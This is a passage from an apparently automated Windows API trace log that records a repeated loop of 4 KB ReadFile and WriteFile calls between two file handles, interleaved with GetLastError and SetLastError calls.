(dwErrCode=0x0) [0101.124] GetLastError () returned 0x0 [0101.124] SetLastError (dwErrCode=0x0) [0101.124] GetLastError () returned 0x0 [0101.124] SetLastError (dwErrCode=0x0) [0101.124] GetLastError () returned 0x0 [0101.124] SetLastError (dwErrCode=0x0) [0101.124] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.125] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.125] GetLastError () returned 0x0 [0101.125] SetLastError (dwErrCode=0x0) [0101.126] GetLastError () returned 0x0 [0101.126] SetLastError (dwErrCode=0x0) [0101.126] GetLastError () returned 0x0 [0101.126] SetLastError (dwErrCode=0x0) [0101.126] GetLastError () returned 0x0 [0101.126] SetLastError (dwErrCode=0x0) [0101.126] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.126] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.126] GetLastError () returned 0x0 [0101.126] SetLastError (dwErrCode=0x0) [0101.126] GetLastError () returned 0x0 [0101.126] SetLastError (dwErrCode=0x0) [0101.127] GetLastError () returned 0x0 [0101.127] SetLastError (dwErrCode=0x0) [0101.127] GetLastError () returned 0x0 [0101.127] SetLastError (dwErrCode=0x0) [0101.127] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.127] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.127] GetLastError () returned 0x0 [0101.127] SetLastError (dwErrCode=0x0) [0101.127] GetLastError () returned 0x0 [0101.127] SetLastError (dwErrCode=0x0) [0101.127] GetLastError () returned 0x0 [0101.127] SetLastError (dwErrCode=0x0) [0101.128] GetLastError () returned 0x0 [0101.128] SetLastError (dwErrCode=0x0) [0101.128] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.128] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.128] GetLastError () returned 0x0 [0101.128] SetLastError (dwErrCode=0x0) [0101.128] GetLastError () returned 0x0 [0101.128] SetLastError (dwErrCode=0x0) [0101.128] GetLastError () returned 0x0 [0101.128] SetLastError (dwErrCode=0x0) [0101.129] GetLastError () returned 0x0 [0101.129] SetLastError (dwErrCode=0x0) [0101.129] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.129] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.129] GetLastError () returned 0x0 [0101.129] SetLastError (dwErrCode=0x0) [0101.129] GetLastError () returned 0x0 [0101.129] SetLastError (dwErrCode=0x0) [0101.129] GetLastError () returned 0x0 [0101.129] SetLastError (dwErrCode=0x0) [0101.129] GetLastError () returned 0x0 [0101.129] SetLastError (dwErrCode=0x0) [0101.130] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.130] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.130] GetLastError () returned 0x0 [0101.130] SetLastError (dwErrCode=0x0) [0101.130] GetLastError () returned 0x0 [0101.130] SetLastError (dwErrCode=0x0) [0101.130] GetLastError () returned 0x0 [0101.130] SetLastError (dwErrCode=0x0) [0101.130] GetLastError () returned 0x0 [0101.130] SetLastError (dwErrCode=0x0) [0101.131] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.131] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.131] GetLastError () returned 0x0 [0101.131] SetLastError (dwErrCode=0x0) [0101.131] GetLastError () returned 0x0 [0101.131] SetLastError (dwErrCode=0x0) [0101.131] GetLastError () returned 0x0 [0101.131] SetLastError (dwErrCode=0x0) [0101.131] GetLastError () returned 0x0 [0101.131] SetLastError (dwErrCode=0x0) [0101.132] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.132] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.132] GetLastError () returned 0x0 [0101.132] SetLastError (dwErrCode=0x0) [0101.132] GetLastError () returned 0x0 [0101.132] SetLastError (dwErrCode=0x0) [0101.132] GetLastError () returned 0x0 [0101.132] SetLastError (dwErrCode=0x0) [0101.132] GetLastError () returned 0x0 [0101.132] SetLastError (dwErrCode=0x0) [0101.132] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.133] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.133] GetLastError () returned 0x0 [0101.133] SetLastError (dwErrCode=0x0) [0101.133] GetLastError () returned 0x0 [0101.133] SetLastError (dwErrCode=0x0) [0101.133] GetLastError () returned 0x0 [0101.133] SetLastError (dwErrCode=0x0) [0101.133] GetLastError () returned 0x0 [0101.133] SetLastError (dwErrCode=0x0) [0101.133] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.133] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.134] GetLastError () returned 0x0 [0101.134] SetLastError (dwErrCode=0x0) [0101.134] GetLastError () returned 0x0 [0101.134] SetLastError (dwErrCode=0x0) [0101.134] GetLastError () returned 0x0 [0101.134] SetLastError (dwErrCode=0x0) [0101.134] GetLastError () returned 0x0 [0101.134] SetLastError (dwErrCode=0x0) [0101.134] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.134] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.135] GetLastError () returned 0x0 [0101.135] SetLastError (dwErrCode=0x0) [0101.135] GetLastError () returned 0x0 [0101.135] SetLastError (dwErrCode=0x0) [0101.135] GetLastError () returned 0x0 [0101.135] SetLastError (dwErrCode=0x0) [0101.135] GetLastError () returned 0x0 [0101.135] SetLastError (dwErrCode=0x0) [0101.135] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.227] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.228] GetLastError () returned 0x0 [0101.228] SetLastError (dwErrCode=0x0) [0101.228] GetLastError () returned 0x0 [0101.228] SetLastError (dwErrCode=0x0) [0101.228] GetLastError () returned 0x0 [0101.228] SetLastError (dwErrCode=0x0) [0101.228] GetLastError () returned 0x0 [0101.228] SetLastError (dwErrCode=0x0) [0101.228] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.229] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.229] GetLastError () returned 0x0 [0101.229] SetLastError (dwErrCode=0x0) [0101.229] GetLastError () returned 0x0 [0101.229] SetLastError (dwErrCode=0x0) [0101.229] GetLastError () returned 0x0 [0101.229] SetLastError (dwErrCode=0x0) [0101.229] GetLastError () returned 0x0 [0101.229] SetLastError (dwErrCode=0x0) [0101.230] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.230] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.230] GetLastError () returned 0x0 [0101.230] SetLastError (dwErrCode=0x0) [0101.230] GetLastError () returned 0x0 [0101.230] SetLastError (dwErrCode=0x0) [0101.230] GetLastError () returned 0x0 [0101.230] SetLastError (dwErrCode=0x0) [0101.230] GetLastError () returned 0x0 [0101.230] SetLastError (dwErrCode=0x0) [0101.231] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.231] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.231] GetLastError () returned 0x0 [0101.231] SetLastError (dwErrCode=0x0) [0101.231] GetLastError () returned 0x0 [0101.231] SetLastError (dwErrCode=0x0) [0101.231] GetLastError () returned 0x0 [0101.231] SetLastError (dwErrCode=0x0) [0101.231] GetLastError () returned 0x0 [0101.231] SetLastError (dwErrCode=0x0) [0101.232] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.232] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.232] GetLastError () returned 0x0 [0101.232] SetLastError (dwErrCode=0x0) [0101.232] GetLastError () returned 0x0 [0101.232] SetLastError (dwErrCode=0x0) [0101.232] GetLastError () returned 0x0 [0101.232] SetLastError (dwErrCode=0x0) [0101.232] GetLastError () returned 0x0 [0101.233] SetLastError (dwErrCode=0x0) [0101.233] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.233] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.233] GetLastError () returned 0x0 [0101.233] SetLastError (dwErrCode=0x0) [0101.233] GetLastError () returned 0x0 [0101.233] SetLastError (dwErrCode=0x0) [0101.233] GetLastError () returned 0x0 [0101.234] SetLastError (dwErrCode=0x0) [0101.234] GetLastError () returned 0x0 [0101.234] SetLastError (dwErrCode=0x0) [0101.234] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.234] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.235] GetLastError () returned 0x0 [0101.235] SetLastError (dwErrCode=0x0) [0101.235] GetLastError () returned 0x0 [0101.235] SetLastError (dwErrCode=0x0) [0101.235] GetLastError () returned 0x0 [0101.235] SetLastError (dwErrCode=0x0) [0101.235] GetLastError () returned 0x0 [0101.235] SetLastError (dwErrCode=0x0) [0101.235] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.235] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.235] GetLastError () returned 0x0 [0101.236] SetLastError (dwErrCode=0x0) [0101.236] GetLastError () returned 0x0 [0101.236] SetLastError (dwErrCode=0x0) [0101.236] GetLastError () returned 0x0 [0101.236] SetLastError (dwErrCode=0x0) [0101.236] GetLastError () returned 0x0 [0101.236] SetLastError (dwErrCode=0x0) [0101.236] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.236] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.237] GetLastError () returned 0x0 [0101.237] SetLastError (dwErrCode=0x0) [0101.237] GetLastError () returned 0x0 [0101.237] SetLastError (dwErrCode=0x0) [0101.238] GetLastError () returned 0x0 [0101.238] SetLastError (dwErrCode=0x0) [0101.238] GetLastError () returned 0x0 [0101.238] SetLastError (dwErrCode=0x0) [0101.238] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.238] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.238] GetLastError () returned 0x0 [0101.238] SetLastError (dwErrCode=0x0) [0101.238] GetLastError () returned 0x0 [0101.238] SetLastError (dwErrCode=0x0) [0101.238] GetLastError () returned 0x0 [0101.239] SetLastError (dwErrCode=0x0) [0101.239] GetLastError () returned 0x0 [0101.239] SetLastError (dwErrCode=0x0) [0101.239] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.239] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.239] GetLastError () returned 0x0 [0101.239] SetLastError (dwErrCode=0x0) [0101.239] GetLastError () returned 0x0 [0101.239] SetLastError (dwErrCode=0x0) [0101.239] GetLastError () returned 0x0 [0101.239] SetLastError (dwErrCode=0x0) [0101.240] GetLastError () returned 0x0 [0101.240] SetLastError (dwErrCode=0x0) [0101.240] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.240] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.240] GetLastError () returned 0x0 [0101.240] SetLastError (dwErrCode=0x0) [0101.240] GetLastError () returned 0x0 [0101.240] SetLastError (dwErrCode=0x0) [0101.240] GetLastError () returned 0x0 [0101.240] SetLastError (dwErrCode=0x0) [0101.240] GetLastError () returned 0x0 [0101.240] SetLastError (dwErrCode=0x0) [0101.240] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.240] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.240] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.241] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] GetLastError () returned 0x0 [0101.241] SetLastError (dwErrCode=0x0) [0101.241] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.241] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.242] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] GetLastError () returned 0x0 [0101.242] SetLastError (dwErrCode=0x0) [0101.242] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.243] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.243] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.243] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.243] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.243] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.243] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.243] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.243] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.243] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.243] GetLastError () returned 0x0 [0101.243] SetLastError (dwErrCode=0x0) [0101.244] GetLastError () returned 0x0 [0101.244] SetLastError (dwErrCode=0x0) [0101.244] GetLastError () returned 0x0 [0101.244] SetLastError (dwErrCode=0x0) [0101.244] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.244] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.244] GetLastError () returned 0x0 [0101.244] SetLastError (dwErrCode=0x0) [0101.244] GetLastError () returned 0x0 [0101.244] SetLastError (dwErrCode=0x0) [0101.244] GetLastError () returned 0x0 [0101.244] SetLastError (dwErrCode=0x0) [0101.244] GetLastError () returned 0x0 [0101.244] SetLastError (dwErrCode=0x0) [0101.244] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.244] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.245] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] GetLastError () returned 0x0 [0101.245] SetLastError (dwErrCode=0x0) [0101.245] GetLastError () returned 0x0 